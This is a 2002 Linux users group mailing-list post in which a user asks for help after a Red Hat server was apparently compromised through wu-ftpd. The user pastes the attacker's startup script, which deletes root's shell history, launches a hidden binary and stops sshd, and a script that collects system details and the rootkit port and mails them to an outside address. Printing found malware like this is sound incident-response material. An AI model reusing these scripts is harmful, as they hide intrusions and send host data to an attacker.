[lug] i got hacked

j davis davis_compz at hotmail.com
Thu Apr 18 15:44:09 MDT 2002


i have a box at a place i do contract work about 2 days a month.
today i could not ssh to it. so iwent on site and discoverd i got 
hacked...like a dummy i didnt have tcp wrappers on or a firewall . i think 
they exploited wu-ftpd
..i use redhat 7.1 with wu-ftpd 2.6.1-20...i havent got around to upgrading 
yet.
anyway here is what i found in /etc/rc3.d/S52remote

#!/bin/sh

rm -rf /root/.bash_history
ln -s /dev/null /root/.bash_history

cd /dev
./ryz -f ./s
/etc/rc.d/init.d/sshd stop
cd /

/usr/bin/trimite

then here is /usr/bin/trimite

#!/bin/sh

echo "* Info : $(uname -a)" >> /tmp/info
echo "* Hostname : $(hostname -f)" >> /tmp/info
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
echo "* Uptime : $(uptime)" >> /tmp/info
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
echo "* Spatiu Liber: $(df -h)" >> /tmp/info
echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
echo "* Portul rootkitului este 25897" >> /tmp/info
cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
rm -f /tmp/info

so, netstat says i have something listening on 25897...what should i do?!
never benn hacked before....i already turned off ftp and turned on tcp 
wrappers.

help please
jd






_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.




More information about the LUG mailing list